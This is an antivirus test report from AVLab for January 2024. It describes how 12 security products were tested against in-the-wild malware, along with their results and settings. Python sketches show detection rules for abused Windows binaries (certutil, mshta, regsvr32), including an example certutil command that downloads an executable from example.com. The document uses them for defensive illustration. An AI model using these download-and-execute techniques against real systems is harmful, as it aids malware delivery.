The January 2024 edition of the “Advanced In-The-Wild Malware Test” included a higher number of malware samples than usual. Based on the telemetry data collected during the test, this may be due to above-average activity by malware authors who disguise their samples as legitimate applications and installers and post them on popular Discord and Telegram channels. We mention instant messengers and open groups that anyone can join for a reason: in this series of tests, we evaluate how effectively software protects Windows against real threats from a variety of Internet sources, including instant messaging, which is very popular among home and office users.



Because each sample must be verified through a series of preliminary analyses before it is tested, we ultimately used 380 malware samples, 19% of which turned out to be 0-day files (according to the antivirus engine of our technology partner, MKS_VIR Sp. z o.o.).

Our tests comply with the guidelines of the Anti-Malware Testing Standards Organization. Details about the test are available on this website and in our methodology.

In January 2024, we tested the effectiveness of the following security solutions:

- Avast Free Antivirus

- Cegis Shield

- F-Secure Total

- Panda Dome

- McAfee Total Protection

- Malwarebytes Premium

- Microsoft Defender

- Webroot Antivirus

- Comodo Internet Security Pro

Solutions for business & government institutions:

- Emsisoft Enterprise Security + EDR

- ThreatDown Endpoint Protection + EDR

- Xcitium ZeroThreat Advanced + EDR

Testing security in January 2024

A newcomer in this edition was Cegis Cyber Inc., a developer from the United States, which received a recommendation from the AVLab Cybersecurity Foundation by meeting the standards required for the EXCELLENT certificate. We also included the well-known Panda Dome and McAfee Total Protection in the test.

In total, we tested 12 solutions. Almost all of them effectively neutralized more than 99% of the in-the-wild threats. If you would like to dig deeper, consider analyzing the detailed results, where we distinguish the stage at which each threat was blocked and calculate the average time needed to completely neutralize a threat (the life cycle of malware in the system).

Furthermore, we have added a new statistic from the telemetry data. Cybercriminals often use legitimate, trusted software, as well as built-in Windows components, to conceal malicious activity. These so-called ‘Living off the Land Binaries’ (LOLBins) are crucial to the proper functioning of the operating system, so blocking them during a cyber attack can be difficult or even impossible, which makes them highly appealing to malware creators.

Key technical data and results are available on the RECENT RESULTS page, along with a threat landscape developed from the test's telemetry data.

How do we evaluate the tested solutions in 3 steps?

In a nutshell, the Advanced In-The-Wild Malware Test consists of three consecutive stages that combine into a whole:

1. Selecting samples for the test and analyzing malware logs

We continuously collect malware from the Internet in the form of real URLs. We draw on a wide spectrum of malware from various sources, namely public feeds and honeypots. As a result, the test covers the most up-to-date and diverse set of threats.

Samples analyzed on Windows undergo thorough verification against hundreds of rules covering the techniques most commonly used by malware creators (such as abuse of LOLBins). We monitor system processes, network connections, the Windows registry, and other changes made to the operating system and file system to determine what truly indicates that a given sample is harmful.
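
To illustrate what a behavioral rule of this kind can look like, here is a minimal sketch that checks simplified process-creation events against a tiny, hypothetical LOLBin rule set. The rule table, the `ProcessEvent` type, and `match_lolbin_rules` are assumptions for illustration only, not AVLab's actual rule base, which is far larger and richer.

```python
import ntpath
from dataclasses import dataclass

# Hypothetical rule set for illustration only: a few well-known Windows
# LOLBins mapped to command-line fragments that often indicate abuse.
# The real test relies on hundreds of rules with richer conditions.
LOLBIN_RULES = {
    "certutil.exe": ["-urlcache", "-decode"],
    "mshta.exe": ["http://", "https://", "javascript:"],
    "regsvr32.exe": ["/i:http", "scrobj.dll"],
}


@dataclass
class ProcessEvent:
    """Simplified process-creation event captured while a sample runs."""
    image: str         # path or name of the started executable
    command_line: str  # full command line of the new process


def match_lolbin_rules(event: ProcessEvent) -> list[tuple[str, str]]:
    """Return (binary, matched fragment) pairs for every rule the event hits."""
    # ntpath parses Windows-style paths regardless of the host OS.
    binary = ntpath.basename(event.image).lower()
    cmd = event.command_line.lower()
    return [(binary, frag) for frag in LOLBIN_RULES.get(binary, []) if frag in cmd]


if __name__ == "__main__":
    events = [
        ProcessEvent(r"C:\Windows\System32\certutil.exe",
                     "certutil.exe -urlcache -split -f http://example.com/a.exe a.exe"),
        ProcessEvent("notepad.exe", "notepad.exe notes.txt"),
    ]
    hits = [hit for e in events for hit in match_lolbin_rules(e)]
    print(hits)  # [('certutil.exe', '-urlcache')]
```

Matching on the binary name plus suspicious arguments, rather than on the binary alone, reflects the point made above: LOLBins are legitimate system tools, so their mere execution is not evidence of harm.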

In the next step, each malware sample is downloaded from its actual URL by a browser, simultaneously on all operating systems with the tested security products installed.

What happens next?

2. Simulating a real-world scenario

In the test, we simulate a real-world scenario of a threat entering the system from a URL. It can be a website prepared by a scammer or a link sent to a victim via messenger, email, or document. The link is then opened in the system browser (we use Firefox).

The final result distinguishes two scenarios for blocking a given threat:

- PRE-LAUNCH: If a link to a file is quickly identified and blocked in the browser, we assign the result to the so-called PRE-LAUNCH level, where a threat is blocked at an early stage, before it is even launched.

- POST-LAUNCH: If malware is downloaded and allowed to run, and is then successfully blocked, we assign the result to this level, which assesses the real effectiveness of the security product against threats, including 0-day ones.

While the Pre-Launch level indicates malware that was quickly detected and blocked before activating its malicious payload, the Post-Launch level refers to a threat caught by any of the developer’s technologies (local or cloud-based) after being executed in the system. The best-performing solutions at this level are those that offer diversified protection in the form of multiple security layers.
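
The two blocking levels can be expressed as a simple per-sample classification. The sketch below assumes each product's outcome for a sample is recorded as two booleans; `SampleResult`, `Stage`, and the sample IDs are hypothetical names, and the third category simply covers samples that were never blocked.

```python
from collections import Counter
from dataclasses import dataclass
from enum import Enum


class Stage(Enum):
    PRE_LAUNCH = "PRE-LAUNCH"    # blocked before the file could run
    POST_LAUNCH = "POST-LAUNCH"  # ran, then stopped by a local or cloud layer
    NOT_BLOCKED = "NOT BLOCKED"  # never stopped by the product


@dataclass
class SampleResult:
    """Hypothetical per-sample observation for one tested product."""
    sample_id: str
    blocked_in_browser: bool       # URL or download stopped in the browser
    blocked_after_execution: bool  # malware ran and was then blocked


def classify(result: SampleResult) -> Stage:
    # An early browser block takes precedence: the sample never ran.
    if result.blocked_in_browser:
        return Stage.PRE_LAUNCH
    if result.blocked_after_execution:
        return Stage.POST_LAUNCH
    return Stage.NOT_BLOCKED


def summarize(results: list[SampleResult]) -> Counter:
    """Count how many samples ended at each stage."""
    return Counter(classify(r) for r in results)


if __name__ == "__main__":
    results = [
        SampleResult("sample-1", True, False),
        SampleResult("sample-2", False, True),
        SampleResult("sample-3", False, True),
        SampleResult("sample-4", False, False),
    ]
    counts = summarize(results)
    for stage in Stage:
        print(stage.value, counts[stage])
```

Giving the browser block precedence mirrors the definition above: a threat stopped at the link never reaches the Post-Launch level.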

3. Assessment of incident recovery time (Remediation Time)

In addition to detecting and blocking 0-day threats, we calculate the time required to automatically recover from the incident caused by a given malware sample (Average Automatic Remediation Time).

We configure the tested products so that removal of the attack's effects and repair of the system are carried out automatically, without asking the user for a decision.

Ultimately, for each malware sample, we measure the time from its execution, through the detection of malicious activity, to the automatic recovery from the incident.
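
As a worked illustration of this measurement, the following sketch computes per-sample remediation time and its mean for one product. It assumes that the execution time and the completion of automatic recovery are both logged as timestamps; the function names and the example timestamps are hypothetical and are not data from the test.

```python
from datetime import datetime
from statistics import mean


def remediation_seconds(executed_at: datetime, remediated_at: datetime) -> float:
    """Seconds from sample execution to completed automatic recovery."""
    delta = (remediated_at - executed_at).total_seconds()
    if delta < 0:
        raise ValueError("recovery timestamp precedes execution")
    return delta


def average_remediation_time(events: list[tuple[datetime, datetime]]) -> float:
    """Mean remediation time over (executed_at, remediated_at) pairs for one product."""
    return mean(remediation_seconds(start, end) for start, end in events)


if __name__ == "__main__":
    # Hypothetical timestamps for two samples, not results from the test.
    events = [
        (datetime(2024, 1, 15, 12, 0, 0), datetime(2024, 1, 15, 12, 0, 4)),
        (datetime(2024, 1, 15, 12, 10, 0), datetime(2024, 1, 15, 12, 10, 10)),
    ]
    print(average_remediation_time(events))  # 7.0
```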

January 2024 Test Summary



Telemetry data shows that the average response time to a threat across all developers combined was 55 seconds. Avast (4 seconds on average), ThreatDown (34 seconds), and Malwarebytes (41 seconds) were the fastest at blocking and removing threats, without a single failure.

Not all developers managed to detect and block every in-the-wild malware sample. In this edition, Microsoft Defender and Panda Software each had a confirmed negative result (2 unblocked samples), followed by Cegis, F-Secure, and Webroot with 1 unblocked sample each.
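
To put these misses in perspective, the protection rate follows from simple arithmetic. This sketch assumes every product faced all 380 samples and that the counts above apply to each product individually; `protection_rate` and the `UNBLOCKED` table are illustrative names, not part of AVLab's published methodology.

```python
TOTAL_SAMPLES = 380  # malware samples used in the January 2024 edition

# Unblocked-sample counts as reported above, assumed to be per product.
UNBLOCKED = {
    "Microsoft Defender": 2,
    "Panda": 2,
    "Cegis": 1,
    "F-Secure": 1,
    "Webroot": 1,
}


def protection_rate(unblocked: int, total: int = TOTAL_SAMPLES) -> float:
    """Percentage of samples neutralized, given the number left unblocked."""
    if not 0 <= unblocked <= total:
        raise ValueError("unblocked must be between 0 and total")
    return 100.0 * (total - unblocked) / total


if __name__ == "__main__":
    for product, missed in UNBLOCKED.items():
        print(f"{product}: {protection_rate(missed):.2f}%")
    # e.g. "Microsoft Defender: 99.47%" and "Cegis: 99.74%"
```

Under these assumptions, even 2 unblocked samples out of 380 still leave a product above the 99% mark.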

We do not use PUP/PUA samples in the test, but in home and small-office environments it is always a good idea to activate PUP/PUA protection. In a business environment, which offers numerous security functions, it is worth using all the available modules.

In the “Advanced In-The-Wild Malware Test” series, we usually use the default settings of security products. Presets are good, but not always the best. For full transparency, we therefore list the changes we made, either to improve protection or because the developer required them.

In addition to the changes listed below, we always configure each solution so that, first, its dedicated browser extension is installed (if available) and, second, it automatically blocks, removes, and repairs the effects of a malware intrusion into the system.

What settings were used?

- Avast Free Antivirus: default settings + PUP Resolve Automatically

- Cegis Shield: default settings

- Comodo Internet Security Pro: default settings

- Emsisoft Enterprise Security: default settings + PUP Resolve Automatically + EDR Enabled + Rollback Enabled

- F-Secure Total: default settings

- Malwarebytes Premium: default settings

- McAfee Total Protection: default settings

- Microsoft Defender: default settings

- Panda Antivirus Advanced: default settings

- ThreatDown Endpoint Protection: default settings + EDR Enabled

- Webroot Antivirus: default settings

- Xcitium ZeroThreat Advanced: preset policy -> Windows – Security Level 3 Profile v.7.3 + EDR